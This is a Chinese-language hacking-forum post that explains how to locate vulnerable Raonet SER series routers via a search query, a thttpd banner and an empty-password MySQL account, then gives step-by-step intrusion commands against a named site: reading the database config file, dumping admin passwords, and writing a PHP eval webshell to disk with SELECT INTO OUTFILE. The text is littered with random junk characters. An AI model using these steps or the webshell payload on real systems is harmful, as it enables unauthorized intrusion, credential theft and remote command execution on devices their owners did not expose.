寻找存在漏洞的路由器方法:3 [# M; V8 ]' Q
. Y: Q- Y: Z5 M1:google搜索'Raonet Subscriber Ethernet Router' S6 N5 q6 j# U% }9 t4 s- F
h1 {" ]4 k* k" E% _2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001" U4 |7 z' h& q% p4 z6 t
R8 P* _7 y; ]. o7 K) Y2 B8 }3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
. I& M' F6 U% Z4 B; g2 g4 T0 g$ c9 x1 U" D1 V9 J
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
6 g. U" @' v! }" a: e' u5 J5 g( H' ?* b& h8 W
$ o) `) G$ F- o* w; D( S
3 l4 P# e& F7 `1 ^ {$ x e' k入侵步骤:
" i {7 i& \) ~
# L7 Q! W2 }0 K3 G3 p. L$ a; S1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
! l5 ?- z/ o* X' l, m
8 p. ?5 M7 E# S; x: R2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
7 t$ u" f7 K7 c) K/ X" U3:得到密码后连接,查看GUI管理密码:
( f# u" J/ Y, b: T+ [/ L( d Huse ser_500+ C# I5 e* P2 ^( x; J8 o
select id,passwd from user;: ^$ ~1 Y% |5 O8 q" |
4:通过数据库写入webshell,执行命令:
2 C+ ?0 E* f0 d0 o. X9 g8 ruse mysql;
3 G7 Q5 {9 L& D3 [" e; u, ?# ^create table ok(cmd TEXT);4 l" o9 z5 v" M. r# z4 J) g) S
insert into ok values("<?php @eval($_POST[cmd])?>");
* R9 ]4 |0 B6 r n+ dselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
% \3 w, m) Q9 I3 Odrop table ok;
, N$ w7 j. m; D! v+ d5 p* ? w- k. l% R0 p
5:连接后门shell.php ) @0 u2 \$ }) p: |& ?: U, ~$ T0 _
4 J5 N" D8 H" f# D% y
6. 搞定!
- F" U0 E) T9 E* j( B! M% C# W9 P5 m, G8 U V: q+ t; b5 [
|